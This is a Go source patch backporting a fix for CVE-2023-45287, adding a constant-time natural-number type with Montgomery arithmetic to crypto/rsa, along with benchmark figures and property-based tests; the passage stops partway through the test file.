15This patch removes the use of big.Int for encryption and decryption,
16replacing it with an internal nat type instead. Signing and verification
17are also affected, because they depend on encryption and decryption.
18
19Overall, this patch degrades performance by 55% for private key
20operations, and 4-5x for (much faster) public key operations.
21(Signatures do both, so the slowdown is worse than decryption.)
22
23name old time/op new time/op delta
24DecryptPKCS1v15/2048-8 1.50ms ± 0% 2.34ms ± 0% +56.44% (p=0.000 n=8+10)
25DecryptPKCS1v15/3072-8 4.40ms ± 0% 6.79ms ± 0% +54.33% (p=0.000 n=10+9)
26DecryptPKCS1v15/4096-8 9.31ms ± 0% 15.14ms ± 0% +62.60% (p=0.000 n=10+10)
27EncryptPKCS1v15/2048-8 8.16µs ± 0% 355.58µs ± 0% +4258.90% (p=0.000 n=10+9)
28DecryptOAEP/2048-8 1.50ms ± 0% 2.34ms ± 0% +55.68% (p=0.000 n=10+9)
29EncryptOAEP/2048-8 8.51µs ± 0% 355.95µs ± 0% +4082.75% (p=0.000 n=10+9)
30SignPKCS1v15/2048-8 1.51ms ± 0% 2.69ms ± 0% +77.94% (p=0.000 n=10+10)
31VerifyPKCS1v15/2048-8 7.25µs ± 0% 354.34µs ± 0% +4789.52% (p=0.000 n=9+9)
32SignPSS/2048-8 1.51ms ± 0% 2.70ms ± 0% +78.80% (p=0.000 n=9+10)
33VerifyPSS/2048-8 8.27µs ± 1% 355.65µs ± 0% +4199.39% (p=0.000 n=10+10)
34
35Keep in mind that this is without any assembly at all, and that further
36improvements are likely possible. I think having a review of the logic
37and the cryptography would be a good idea at this stage, before we
38complicate the code too much through optimization.
39
40The bulk of the work is in nat.go. This introduces two new types: nat,
41representing natural numbers, and modulus, representing moduli used in
42modular arithmetic.
43
44A nat has an "announced size", which may be larger than its "true size",
45the number of bits needed to represent this number. Operations on a nat
46will only ever leak its announced size, never its true size, or other
47information about its value. The size of a nat is always clear based on
48how its value is set. For example, x.mod(y, m) will make the announced
49size of x match that of m, since x is reduced modulo m.
50
51Operations assume that the announced size of the operands match what's
52expected (with a few exceptions). For example, x.modAdd(y, m) assumes
53that x and y have the same announced size as m, and that they're reduced
54modulo m.
55
56Nats are represented over unsatured bits.UintSize - 1 bit limbs. This
57means that we can't reuse the assembly routines for big.Int, which use
58saturated bits.UintSize limbs. The advantage of unsaturated limbs is
59that it makes Montgomery multiplication faster, by needing fewer
60registers in a hot loop. This makes exponentiation faster, which
61consists of many Montgomery multiplications.
62
63Moduli use nat internally. Unlike nat, the true size of a modulus always
64matches its announced size. When creating a modulus, any zero padding is
65removed. Moduli will also precompute constants when created, which is
66another reason why having a separate type is desirable.
67
68Updates #20654
69
70Co-authored-by: Filippo Valsorda <filippo@golang.org>
71Change-Id: I73b61f87d58ab912e80a9644e255d552cbadcced
72Reviewed-on: https://go-review.googlesource.com/c/go/+/326012
73Run-TryBot: Filippo Valsorda <filippo@golang.org>
74TryBot-Result: Gopher Robot <gobot@golang.org>
75Reviewed-by: Roland Shoemaker <roland@golang.org>
76Reviewed-by: Joedian Reid <joedian@golang.org>
77
78Upstream-Status: Backport [https://github.com/golang/go/commit/8a81fdf165facdcefa06531de5af98a4db343035]
79CVE: CVE-2023-45287
80Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
81---
82 src/crypto/rsa/example_test.go | 21 +-
83 src/crypto/rsa/nat.go | 626 +++++++++++++++++++++++++++++++++
84 src/crypto/rsa/nat_test.go | 384 ++++++++++++++++++++
85 src/crypto/rsa/pkcs1v15.go | 47 +--
86 src/crypto/rsa/pss.go | 50 ++-
87 src/crypto/rsa/pss_test.go | 10 +-
88 src/crypto/rsa/rsa.go | 174 ++++-----
89 7 files changed, 1143 insertions(+), 169 deletions(-)
90 create mode 100644 src/crypto/rsa/nat.go
91 create mode 100644 src/crypto/rsa/nat_test.go
92
93diff --git a/src/crypto/rsa/example_test.go b/src/crypto/rsa/example_test.go
94index 1435b70..1963609 100644
95--- a/src/crypto/rsa/example_test.go
96+++ b/src/crypto/rsa/example_test.go
97@@ -12,7 +12,6 @@ import (
98 "crypto/sha256"
99 "encoding/hex"
100 "fmt"
101- "io"
102 "os"
103 )
104
105@@ -36,21 +35,17 @@ import (
106 // a buffer that contains a random key. Thus, if the RSA result isn't
107 // well-formed, the implementation uses a random key in constant time.
108 func ExampleDecryptPKCS1v15SessionKey() {
109- // crypto/rand.Reader is a good source of entropy for blinding the RSA
110- // operation.
111- rng := rand.Reader
112-
113 // The hybrid scheme should use at least a 16-byte symmetric key. Here
114 // we read the random key that will be used if the RSA decryption isn't
115 // well-formed.
116 key := make([]byte, 32)
117- if _, err := io.ReadFull(rng, key); err != nil {
118+ if _, err := rand.Read(key); err != nil {
119 panic("RNG failure")
120 }
121
122 rsaCiphertext, _ := hex.DecodeString("aabbccddeeff")
123
124- if err := DecryptPKCS1v15SessionKey(rng, rsaPrivateKey, rsaCiphertext, key); err != nil {
125+ if err := DecryptPKCS1v15SessionKey(nil, rsaPrivateKey, rsaCiphertext, key); err != nil {
126 // Any errors that result will be “public” – meaning that they
127 // can be determined without any secret information. (For
128 // instance, if the length of key is impossible given the RSA
129@@ -86,10 +81,6 @@ func ExampleDecryptPKCS1v15SessionKey() {
130 }
131
132 func ExampleSignPKCS1v15() {
133- // crypto/rand.Reader is a good source of entropy for blinding the RSA
134- // operation.
135- rng := rand.Reader
136-
137 message := []byte("message to be signed")
138
139 // Only small messages can be signed directly; thus the hash of a
140@@ -99,7 +90,7 @@ func ExampleSignPKCS1v15() {
141 // of writing (2016).
142 hashed := sha256.Sum256(message)
143
144- signature, err := SignPKCS1v15(rng, rsaPrivateKey, crypto.SHA256, hashed[:])
145+ signature, err := SignPKCS1v15(nil, rsaPrivateKey, crypto.SHA256, hashed[:])
146 if err != nil {
147 fmt.Fprintf(os.Stderr, "Error from signing: %s\n", err)
148 return
149@@ -151,11 +142,7 @@ func ExampleDecryptOAEP() {
150 ciphertext, _ := hex.DecodeString("4d1ee10e8f286390258c51a5e80802844c3e6358ad6690b7285218a7c7ed7fc3a4c7b950fbd04d4b0239cc060dcc7065ca6f84c1756deb71ca5685cadbb82be025e16449b905c568a19c088a1abfad54bf7ecc67a7df39943ec511091a34c0f2348d04e058fcff4d55644de3cd1d580791d4524b92f3e91695582e6e340a1c50b6c6d78e80b4e42c5b4d45e479b492de42bbd39cc642ebb80226bb5200020d501b24a37bcc2ec7f34e596b4fd6b063de4858dbf5a4e3dd18e262eda0ec2d19dbd8e890d672b63d368768360b20c0b6b8592a438fa275e5fa7f60bef0dd39673fd3989cc54d2cb80c08fcd19dacbc265ee1c6014616b0e04ea0328c2a04e73460")
151 label := []byte("orders")
152
153- // crypto/rand.Reader is a good source of entropy for blinding the RSA
154- // operation.
155- rng := rand.Reader
156-
157- plaintext, err := DecryptOAEP(sha256.New(), rng, test2048Key, ciphertext, label)
158+ plaintext, err := DecryptOAEP(sha256.New(), nil, test2048Key, ciphertext, label)
159 if err != nil {
160 fmt.Fprintf(os.Stderr, "Error from decryption: %s\n", err)
161 return
162diff --git a/src/crypto/rsa/nat.go b/src/crypto/rsa/nat.go
163new file mode 100644
164index 0000000..da521c2
165--- /dev/null
166+++ b/src/crypto/rsa/nat.go
167@@ -0,0 +1,626 @@
168+// Copyright 2021 The Go Authors. All rights reserved.
169+// Use of this source code is governed by a BSD-style
170+// license that can be found in the LICENSE file.
171+
172+package rsa
173+
174+import (
175+ "math/big"
176+ "math/bits"
177+)
178+
179+const (
180+ // _W is the number of bits we use for our limbs.
181+ _W = bits.UintSize - 1
182+ // _MASK selects _W bits from a full machine word.
183+ _MASK = (1 << _W) - 1
184+)
185+
186+// choice represents a constant-time boolean. The value of choice is always
187+// either 1 or 0. We use an int instead of bool in order to make decisions in
188+// constant time by turning it into a mask.
189+type choice uint
190+
191+func not(c choice) choice { return 1 ^ c }
192+
193+const yes = choice(1)
194+const no = choice(0)
195+
196+// ctSelect returns x if on == 1, and y if on == 0. The execution time of this
197+// function does not depend on its inputs. If on is any value besides 1 or 0,
198+// the result is undefined.
199+func ctSelect(on choice, x, y uint) uint {
200+ // When on == 1, mask is 0b111..., otherwise mask is 0b000...
201+ mask := -uint(on)
202+ // When mask is all zeros, we just have y, otherwise, y cancels with itself.
203+ return y ^ (mask & (y ^ x))
204+}
205+
206+// ctEq returns 1 if x == y, and 0 otherwise. The execution time of this
207+// function does not depend on its inputs.
208+func ctEq(x, y uint) choice {
209+ // If x != y, then either x - y or y - x will generate a carry.
210+ _, c1 := bits.Sub(x, y, 0)
211+ _, c2 := bits.Sub(y, x, 0)
212+ return not(choice(c1 | c2))
213+}
214+
215+// ctGeq returns 1 if x >= y, and 0 otherwise. The execution time of this
216+// function does not depend on its inputs.
217+func ctGeq(x, y uint) choice {
218+ // If x < y, then x - y generates a carry.
219+ _, carry := bits.Sub(x, y, 0)
220+ return not(choice(carry))
221+}
222+
223+// nat represents an arbitrary natural number
224+//
225+// Each nat has an announced length, which is the number of limbs it has stored.
226+// Operations on this number are allowed to leak this length, but will not leak
227+// any information about the values contained in those limbs.
228+type nat struct {
229+ // limbs is a little-endian representation in base 2^W with
230+ // W = bits.UintSize - 1. The top bit is always unset between operations.
231+ //
232+ // The top bit is left unset to optimize Montgomery multiplication, in the
233+ // inner loop of exponentiation. Using fully saturated limbs would leave us
234+ // working with 129-bit numbers on 64-bit platforms, wasting a lot of space,
235+ // and thus time.
236+ limbs []uint
237+}
238+
239+// expand expands x to n limbs, leaving its value unchanged.
240+func (x *nat) expand(n int) *nat {
241+ for len(x.limbs) > n {
242+ if x.limbs[len(x.limbs)-1] != 0 {
243+ panic("rsa: internal error: shrinking nat")
244+ }
245+ x.limbs = x.limbs[:len(x.limbs)-1]
246+ }
247+ if cap(x.limbs) < n {
248+ newLimbs := make([]uint, n)
249+ copy(newLimbs, x.limbs)
250+ x.limbs = newLimbs
251+ return x
252+ }
253+ extraLimbs := x.limbs[len(x.limbs):n]
254+ for i := range extraLimbs {
255+ extraLimbs[i] = 0
256+ }
257+ x.limbs = x.limbs[:n]
258+ return x
259+}
260+
261+// reset returns a zero nat of n limbs, reusing x's storage if n <= cap(x.limbs).
262+func (x *nat) reset(n int) *nat {
263+ if cap(x.limbs) < n {
264+ x.limbs = make([]uint, n)
265+ return x
266+ }
267+ for i := range x.limbs {
268+ x.limbs[i] = 0
269+ }
270+ x.limbs = x.limbs[:n]
271+ return x
272+}
273+
274+// clone returns a new nat, with the same value and announced length as x.
275+func (x *nat) clone() *nat {
276+ out := &nat{make([]uint, len(x.limbs))}
277+ copy(out.limbs, x.limbs)
278+ return out
279+}
280+
281+// natFromBig creates a new natural number from a big.Int.
282+//
283+// The announced length of the resulting nat is based on the actual bit size of
284+// the input, ignoring leading zeroes.
285+func natFromBig(x *big.Int) *nat {
286+ xLimbs := x.Bits()
287+ bitSize := bigBitLen(x)
288+ requiredLimbs := (bitSize + _W - 1) / _W
289+
290+ out := &nat{make([]uint, requiredLimbs)}
291+ outI := 0
292+ shift := 0
293+ for i := range xLimbs {
294+ xi := uint(xLimbs[i])
295+ out.limbs[outI] |= (xi << shift) & _MASK
296+ outI++
297+ if outI == requiredLimbs {
298+ return out
299+ }
300+ out.limbs[outI] = xi >> (_W - shift)
301+ shift++ // this assumes bits.UintSize - _W = 1
302+ if shift == _W {
303+ shift = 0
304+ outI++
305+ }
306+ }
307+ return out
308+}
309+
310+// fillBytes sets bytes to x as a zero-extended big-endian byte slice.
311+//
312+// If bytes is not long enough to contain the number or at least len(x.limbs)-1
313+// limbs, or has zero length, fillBytes will panic.
314+func (x *nat) fillBytes(bytes []byte) []byte {
315+ if len(bytes) == 0 {
316+ panic("nat: fillBytes invoked with too small buffer")
317+ }
318+ for i := range bytes {
319+ bytes[i] = 0
320+ }
321+ shift := 0
322+ outI := len(bytes) - 1
323+ for i, limb := range x.limbs {
324+ remainingBits := _W
325+ for remainingBits >= 8 {
326+ bytes[outI] |= byte(limb) << shift
327+ consumed := 8 - shift
328+ limb >>= consumed
329+ remainingBits -= consumed
330+ shift = 0
331+ outI--
332+ if outI < 0 {
333+ if limb != 0 || i < len(x.limbs)-1 {
334+ panic("nat: fillBytes invoked with too small buffer")
335+ }
336+ return bytes
337+ }
338+ }
339+ bytes[outI] = byte(limb)
340+ shift = remainingBits
341+ }
342+ return bytes
343+}
344+
345+// natFromBytes converts a slice of big-endian bytes into a nat.
346+//
347+// The announced length of the output depends on the length of bytes. Unlike
348+// big.Int, creating a nat will not remove leading zeros.
349+func natFromBytes(bytes []byte) *nat {
350+ bitSize := len(bytes) * 8
351+ requiredLimbs := (bitSize + _W - 1) / _W
352+
353+ out := &nat{make([]uint, requiredLimbs)}
354+ outI := 0
355+ shift := 0
356+ for i := len(bytes) - 1; i >= 0; i-- {
357+ bi := bytes[i]
358+ out.limbs[outI] |= uint(bi) << shift
359+ shift += 8
360+ if shift >= _W {
361+ shift -= _W
362+ out.limbs[outI] &= _MASK
363+ outI++
364+ if shift > 0 {
365+ out.limbs[outI] = uint(bi) >> (8 - shift)
366+ }
367+ }
368+ }
369+ return out
370+}
371+
372+// cmpEq returns 1 if x == y, and 0 otherwise.
373+//
374+// Both operands must have the same announced length.
375+func (x *nat) cmpEq(y *nat) choice {
376+ // Eliminate bounds checks in the loop.
377+ size := len(x.limbs)
378+ xLimbs := x.limbs[:size]
379+ yLimbs := y.limbs[:size]
380+
381+ equal := yes
382+ for i := 0; i < size; i++ {
383+ equal &= ctEq(xLimbs[i], yLimbs[i])
384+ }
385+ return equal
386+}
387+
388+// cmpGeq returns 1 if x >= y, and 0 otherwise.
389+//
390+// Both operands must have the same announced length.
391+func (x *nat) cmpGeq(y *nat) choice {
392+ // Eliminate bounds checks in the loop.
393+ size := len(x.limbs)
394+ xLimbs := x.limbs[:size]
395+ yLimbs := y.limbs[:size]
396+
397+ var c uint
398+ for i := 0; i < size; i++ {
399+ c = (xLimbs[i] - yLimbs[i] - c) >> _W
400+ }
401+ // If there was a carry, then subtracting y underflowed, so
402+ // x is not greater than or equal to y.
403+ return not(choice(c))
404+}
405+
406+// assign sets x <- y if on == 1, and does nothing otherwise.
407+//
408+// Both operands must have the same announced length.
409+func (x *nat) assign(on choice, y *nat) *nat {
410+ // Eliminate bounds checks in the loop.
411+ size := len(x.limbs)
412+ xLimbs := x.limbs[:size]
413+ yLimbs := y.limbs[:size]
414+
415+ for i := 0; i < size; i++ {
416+ xLimbs[i] = ctSelect(on, yLimbs[i], xLimbs[i])
417+ }
418+ return x
419+}
420+
421+// add computes x += y if on == 1, and does nothing otherwise. It returns the
422+// carry of the addition regardless of on.
423+//
424+// Both operands must have the same announced length.
425+func (x *nat) add(on choice, y *nat) (c uint) {
426+ // Eliminate bounds checks in the loop.
427+ size := len(x.limbs)
428+ xLimbs := x.limbs[:size]
429+ yLimbs := y.limbs[:size]
430+
431+ for i := 0; i < size; i++ {
432+ res := xLimbs[i] + yLimbs[i] + c
433+ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
434+ c = res >> _W
435+ }
436+ return
437+}
438+
439+// sub computes x -= y if on == 1, and does nothing otherwise. It returns the
440+// borrow of the subtraction regardless of on.
441+//
442+// Both operands must have the same announced length.
443+func (x *nat) sub(on choice, y *nat) (c uint) {
444+ // Eliminate bounds checks in the loop.
445+ size := len(x.limbs)
446+ xLimbs := x.limbs[:size]
447+ yLimbs := y.limbs[:size]
448+
449+ for i := 0; i < size; i++ {
450+ res := xLimbs[i] - yLimbs[i] - c
451+ xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
452+ c = res >> _W
453+ }
454+ return
455+}
456+
457+// modulus is used for modular arithmetic, precomputing relevant constants.
458+//
459+// Moduli are assumed to be odd numbers. Moduli can also leak the exact
460+// number of bits needed to store their value, and are stored without padding.
461+//
462+// Their actual value is still kept secret.
463+type modulus struct {
464+ // The underlying natural number for this modulus.
465+ //
466+ // This will be stored without any padding, and shouldn't alias with any
467+ // other natural number being used.
468+ nat *nat
469+ leading int // number of leading zeros in the modulus
470+ m0inv uint // -nat.limbs[0]⁻¹ mod _W
471+}
472+
473+// minusInverseModW computes -x⁻¹ mod _W with x odd.
474+//
475+// This operation is used to precompute a constant involved in Montgomery
476+// multiplication.
477+func minusInverseModW(x uint) uint {
478+ // Every iteration of this loop doubles the least-significant bits of
479+ // correct inverse in y. The first three bits are already correct (1⁻¹ = 1,
480+ // 3⁻¹ = 3, 5⁻¹ = 5, and 7⁻¹ = 7 mod 8), so doubling five times is enough
481+ // for 61 bits (and wastes only one iteration for 31 bits).
482+ //
483+ // See https://crypto.stackexchange.com/a/47496.
484+ y := x
485+ for i := 0; i < 5; i++ {
486+ y = y * (2 - x*y)
487+ }
488+ return (1 << _W) - (y & _MASK)
489+}
490+
491+// modulusFromNat creates a new modulus from a nat.
492+//
493+// The nat should be odd, nonzero, and the number of significant bits in the
494+// number should be leakable. The nat shouldn't be reused.
495+func modulusFromNat(nat *nat) *modulus {
496+ m := &modulus{}
497+ m.nat = nat
498+ size := len(m.nat.limbs)
499+ for m.nat.limbs[size-1] == 0 {
500+ size--
501+ }
502+ m.nat.limbs = m.nat.limbs[:size]
503+ m.leading = _W - bitLen(m.nat.limbs[size-1])
504+ m.m0inv = minusInverseModW(m.nat.limbs[0])
505+ return m
506+}
507+
508+// bitLen is a version of bits.Len that only leaks the bit length of n, but not
509+// its value. bits.Len and bits.LeadingZeros use a lookup table for the
510+// low-order bits on some architectures.
511+func bitLen(n uint) int {
512+ var len int
513+ // We assume, here and elsewhere, that comparison to zero is constant time
514+ // with respect to different non-zero values.
515+ for n != 0 {
516+ len++
517+ n >>= 1
518+ }
519+ return len
520+}
521+
522+// bigBitLen is a version of big.Int.BitLen that only leaks the bit length of x,
523+// but not its value. big.Int.BitLen uses bits.Len.
524+func bigBitLen(x *big.Int) int {
525+ xLimbs := x.Bits()
526+ fullLimbs := len(xLimbs) - 1
527+ topLimb := uint(xLimbs[len(xLimbs)-1])
528+ return fullLimbs*bits.UintSize + bitLen(topLimb)
529+}
530+
531+// modulusSize returns the size of m in bytes.
532+func modulusSize(m *modulus) int {
533+ bits := len(m.nat.limbs)*_W - int(m.leading)
534+ return (bits + 7) / 8
535+}
536+
537+// shiftIn calculates x = x << _W + y mod m.
538+//
539+// This assumes that x is already reduced mod m, and that y < 2^_W.
540+func (x *nat) shiftIn(y uint, m *modulus) *nat {
541+ d := new(nat).resetFor(m)
542+
543+ // Eliminate bounds checks in the loop.
544+ size := len(m.nat.limbs)
545+ xLimbs := x.limbs[:size]
546+ dLimbs := d.limbs[:size]
547+ mLimbs := m.nat.limbs[:size]
548+
549+ // Each iteration of this loop computes x = 2x + b mod m, where b is a bit
550+ // from y. Effectively, it left-shifts x and adds y one bit at a time,
551+ // reducing it every time.
552+ //
553+ // To do the reduction, each iteration computes both 2x + b and 2x + b - m.
554+ // The next iteration (and finally the return line) will use either result
555+ // based on whether the subtraction underflowed.
556+ needSubtraction := no
557+ for i := _W - 1; i >= 0; i-- {
558+ carry := (y >> i) & 1
559+ var borrow uint
560+ for i := 0; i < size; i++ {
561+ l := ctSelect(needSubtraction, dLimbs[i], xLimbs[i])
562+
563+ res := l<<1 + carry
564+ xLimbs[i] = res & _MASK
565+ carry = res >> _W
566+
567+ res = xLimbs[i] - mLimbs[i] - borrow
568+ dLimbs[i] = res & _MASK
569+ borrow = res >> _W
570+ }
571+ // See modAdd for how carry (aka overflow), borrow (aka underflow), and
572+ // needSubtraction relate.
573+ needSubtraction = ctEq(carry, borrow)
574+ }
575+ return x.assign(needSubtraction, d)
576+}
577+
578+// mod calculates out = x mod m.
579+//
580+// This works regardless how large the value of x is.
581+//
582+// The output will be resized to the size of m and overwritten.
583+func (out *nat) mod(x *nat, m *modulus) *nat {
584+ out.resetFor(m)
585+ // Working our way from the most significant to the least significant limb,
586+ // we can insert each limb at the least significant position, shifting all
587+ // previous limbs left by _W. This way each limb will get shifted by the
588+ // correct number of bits. We can insert at least N - 1 limbs without
589+ // overflowing m. After that, we need to reduce every time we shift.
590+ i := len(x.limbs) - 1
591+ // For the first N - 1 limbs we can skip the actual shifting and position
592+ // them at the shifted position, which starts at min(N - 2, i).
593+ start := len(m.nat.limbs) - 2
594+ if i < start {
595+ start = i
596+ }
597+ for j := start; j >= 0; j-- {
598+ out.limbs[j] = x.limbs[i]
599+ i--
600+ }
601+ // We shift in the remaining limbs, reducing modulo m each time.
602+ for i >= 0 {
603+ out.shiftIn(x.limbs[i], m)
604+ i--
605+ }
606+ return out
607+}
608+
609+// expandFor ensures out has the right size to work with operations modulo m.
610+//
611+// This assumes that out has as many or fewer limbs than m, or that the extra
612+// limbs are all zero (which may happen when decoding a value that has leading
613+// zeroes in its bytes representation that spill over the limb threshold).
614+func (out *nat) expandFor(m *modulus) *nat {
615+ return out.expand(len(m.nat.limbs))
616+}
617+
618+// resetFor ensures out has the right size to work with operations modulo m.
619+//
620+// out is zeroed and may start at any size.
621+func (out *nat) resetFor(m *modulus) *nat {
622+ return out.reset(len(m.nat.limbs))
623+}
624+
625+// modSub computes x = x - y mod m.
626+//
627+// The length of both operands must be the same as the modulus. Both operands
628+// must already be reduced modulo m.
629+func (x *nat) modSub(y *nat, m *modulus) *nat {
630+ underflow := x.sub(yes, y)
631+ // If the subtraction underflowed, add m.
632+ x.add(choice(underflow), m.nat)
633+ return x
634+}
635+
636+// modAdd computes x = x + y mod m.
637+//
638+// The length of both operands must be the same as the modulus. Both operands
639+// must already be reduced modulo m.
640+func (x *nat) modAdd(y *nat, m *modulus) *nat {
641+ overflow := x.add(yes, y)
642+ underflow := not(x.cmpGeq(m.nat)) // x < m
643+
644+ // Three cases are possible:
645+ //
646+ // - overflow = 0, underflow = 0
647+ //
648+ // In this case, addition fits in our limbs, but we can still subtract away
649+ // m without an underflow, so we need to perform the subtraction to reduce
650+ // our result.
651+ //
652+ // - overflow = 0, underflow = 1
653+ //
654+ // The addition fits in our limbs, but we can't subtract m without
655+ // underflowing. The result is already reduced.
656+ //
657+ // - overflow = 1, underflow = 1
658+ //
659+ // The addition does not fit in our limbs, and the subtraction's borrow
660+ // would cancel out with the addition's carry. We need to subtract m to
661+ // reduce our result.
662+ //
663+ // The overflow = 1, underflow = 0 case is not possible, because y is at
664+ // most m - 1, and if adding m - 1 overflows, then subtracting m must
665+ // necessarily underflow.
666+ needSubtraction := ctEq(overflow, uint(underflow))
667+
668+ x.sub(needSubtraction, m.nat)
669+ return x
670+}
671+
672+// montgomeryRepresentation calculates x = x * R mod m, with R = 2^(_W * n) and
673+// n = len(m.nat.limbs).
674+//
675+// Faster Montgomery multiplication replaces standard modular multiplication for
676+// numbers in this representation.
677+//
678+// This assumes that x is already reduced mod m.
679+func (x *nat) montgomeryRepresentation(m *modulus) *nat {
680+ for i := 0; i < len(m.nat.limbs); i++ {
681+ x.shiftIn(0, m) // x = x * 2^_W mod m
682+ }
683+ return x
684+}
685+
686+// montgomeryMul calculates d = a * b / R mod m, with R = 2^(_W * n) and
687+// n = len(m.nat.limbs), using the Montgomery Multiplication technique.
688+//
689+// All inputs should be the same length, not aliasing d, and already
690+// reduced modulo m. d will be resized to the size of m and overwritten.
691+func (d *nat) montgomeryMul(a *nat, b *nat, m *modulus) *nat {
692+ // See https://bearssl.org/bigint.html#montgomery-reduction-and-multiplication
693+ // for a description of the algorithm.
694+
695+ // Eliminate bounds checks in the loop.
696+ size := len(m.nat.limbs)
697+ aLimbs := a.limbs[:size]
698+ bLimbs := b.limbs[:size]
699+ dLimbs := d.resetFor(m).limbs[:size]
700+ mLimbs := m.nat.limbs[:size]
701+
702+ var overflow uint
703+ for i := 0; i < size; i++ {
704+ f := ((dLimbs[0] + aLimbs[i]*bLimbs[0]) * m.m0inv) & _MASK
705+ carry := uint(0)
706+ for j := 0; j < size; j++ {
707+ // z = d[j] + a[i] * b[j] + f * m[j] + carry <= 2^(2W+1) - 2^(W+1) + 2^W
708+ hi, lo := bits.Mul(aLimbs[i], bLimbs[j])
709+ z_lo, c := bits.Add(dLimbs[j], lo, 0)
710+ z_hi, _ := bits.Add(0, hi, c)
711+ hi, lo = bits.Mul(f, mLimbs[j])
712+ z_lo, c = bits.Add(z_lo, lo, 0)
713+ z_hi, _ = bits.Add(z_hi, hi, c)
714+ z_lo, c = bits.Add(z_lo, carry, 0)
715+ z_hi, _ = bits.Add(z_hi, 0, c)
716+ if j > 0 {
717+ dLimbs[j-1] = z_lo & _MASK
718+ }
719+ carry = z_hi<<1 | z_lo>>_W // carry <= 2^(W+1) - 2
720+ }
721+ z := overflow + carry // z <= 2^(W+1) - 1
722+ dLimbs[size-1] = z & _MASK
723+ overflow = z >> _W // overflow <= 1
724+ }
725+ // See modAdd for how overflow, underflow, and needSubtraction relate.
726+ underflow := not(d.cmpGeq(m.nat)) // d < m
727+ needSubtraction := ctEq(overflow, uint(underflow))
728+ d.sub(needSubtraction, m.nat)
729+
730+ return d
731+}
732+
733+// modMul calculates x *= y mod m.
734+//
735+// x and y must already be reduced modulo m, they must share its announced
736+// length, and they may not alias.
737+func (x *nat) modMul(y *nat, m *modulus) *nat {
738+ // A Montgomery multiplication by a value out of the Montgomery domain
739+ // takes the result out of Montgomery representation.
740+ xR := x.clone().montgomeryRepresentation(m) // xR = x * R mod m
741+ return x.montgomeryMul(xR, y, m) // x = xR * y / R mod m
742+}
743+
744+// exp calculates out = x^e mod m.
745+//
746+// The exponent e is represented in big-endian order. The output will be resized
747+// to the size of m and overwritten. x must already be reduced modulo m.
748+func (out *nat) exp(x *nat, e []byte, m *modulus) *nat {
749+ // We use a 4 bit window. For our RSA workload, 4 bit windows are faster
750+ // than 2 bit windows, but use an extra 12 nats worth of scratch space.
751+ // Using bit sizes that don't divide 8 are more complex to implement.
752+ table := make([]*nat, (1<<4)-1) // table[i] = x ^ (i+1)
753+ table[0] = x.clone().montgomeryRepresentation(m)
754+ for i := 1; i < len(table); i++ {
755+ table[i] = new(nat).expandFor(m)
756+ table[i].montgomeryMul(table[i-1], table[0], m)
757+ }
758+
759+ out.resetFor(m)
760+ out.limbs[0] = 1
761+ out.montgomeryRepresentation(m)
762+ t0 := new(nat).expandFor(m)
763+ t1 := new(nat).expandFor(m)
764+ for _, b := range e {
765+ for _, j := range []int{4, 0} {
766+ // Square four times.
767+ t1.montgomeryMul(out, out, m)
768+ out.montgomeryMul(t1, t1, m)
769+ t1.montgomeryMul(out, out, m)
770+ out.montgomeryMul(t1, t1, m)
771+
772+ // Select x^k in constant time from the table.
773+ k := uint((b >> j) & 0b1111)
774+ for i := range table {
775+ t0.assign(ctEq(k, uint(i+1)), table[i])
776+ }
777+
778+ // Multiply by x^k, discarding the result if k = 0.
779+ t1.montgomeryMul(out, t0, m)
780+ out.assign(not(ctEq(k, 0)), t1)
781+ }
782+ }
783+
784+ // By Montgomery multiplying with 1 not in Montgomery representation, we
785+ // convert out back from Montgomery representation, because it works out to
786+ // dividing by R.
787+ t0.assign(yes, out)
788+ t1.resetFor(m)
789+ t1.limbs[0] = 1
790+ out.montgomeryMul(t0, t1, m)
791+
792+ return out
793+}
794diff --git a/src/crypto/rsa/nat_test.go b/src/crypto/rsa/nat_test.go
795new file mode 100644
796index 0000000..3e6eb10
797--- /dev/null
798+++ b/src/crypto/rsa/nat_test.go
799@@ -0,0 +1,384 @@
800+// Copyright 2021 The Go Authors. All rights reserved.
801+// Use of this source code is governed by a BSD-style
802+// license that can be found in the LICENSE file.
803+
804+package rsa
805+
806+import (
807+ "bytes"
808+ "math/big"
809+ "math/bits"
810+ "math/rand"
811+ "reflect"
812+ "testing"
813+ "testing/quick"
814+)
815+
816+// Generate generates an even nat. It's used by testing/quick to produce random
817+// *nat values for quick.Check invocations.
818+func (*nat) Generate(r *rand.Rand, size int) reflect.Value {
819+ limbs := make([]uint, size)
820+ for i := 0; i < size; i++ {
821+ limbs[i] = uint(r.Uint64()) & ((1 << _W) - 2)
822+ }
823+ return reflect.ValueOf(&nat{limbs})
824+}
825+
826+func testModAddCommutative(a *nat, b *nat) bool {
827+ mLimbs := make([]uint, len(a.limbs))
828+ for i := 0; i < len(mLimbs); i++ {
829+ mLimbs[i] = _MASK
830+ }
831+ m := modulusFromNat(&nat{mLimbs})
832+ aPlusB := a.clone()
833+ aPlusB.modAdd(b, m)
834+ bPlusA := b.clone()
835+ bPlusA.modAdd(a, m)
836+ return aPlusB.cmpEq(bPlusA) == 1
837+}
838+
839+func TestModAddCommutative(t *testing.T) {
840+ err := quick.Check(testModAddCommutative, &quick.Config{})
841+ if err != nil {
842+ t.Error(err)
843+ }
844+}
845+
846+func testModSubThenAddIdentity(a *nat, b *nat) bool {
847+ mLimbs := make([]uint, len(a.limbs))
848+ for i := 0; i < len(mLimbs); i++ {
849+ mLimbs[i] = _MASK
850+ }
851+ m := modulusFromNat(&nat{mLimbs})
852+ original := a.clone()
853+ a.modSub(b, m)
854+ a.modAdd(b, m)
855+ return a.cmpEq(original) == 1
856+}
857+
858+func TestModSubThenAddIdentity(t *testing.T) {
859+ err := quick.Check(testModSubThenAddIdentity, &quick.Config{})
860+ if err != nil {
861+ t.Error(err)
862+ }
863+}
864+
865+func testMontgomeryRoundtrip(a *nat) bool {
866+ one := &nat{make([]uint, len(a.limbs))}
867+ one.limbs[0] = 1
868+ aPlusOne := a.clone()
869+ aPlusOne.add(1, one)
870+ m := modulusFromNat(aPlusOne)
871+ monty := a.clone()
872+ monty.montgomeryRepresentation(m)
873+ aAgain := monty.clone()
874+ aAgain.montgomeryMul(monty, one, m)
875+ return a.cmpEq(aAgain) == 1
876+}
877+
878+func TestMontgomeryRoundtrip(t *testing.T) {
879+ err := quick.Check(testMontgomeryRoundtrip, &quick.Config{})
880+ if err != nil {
881+ t.Error(err)
882+ }
883+}
884+
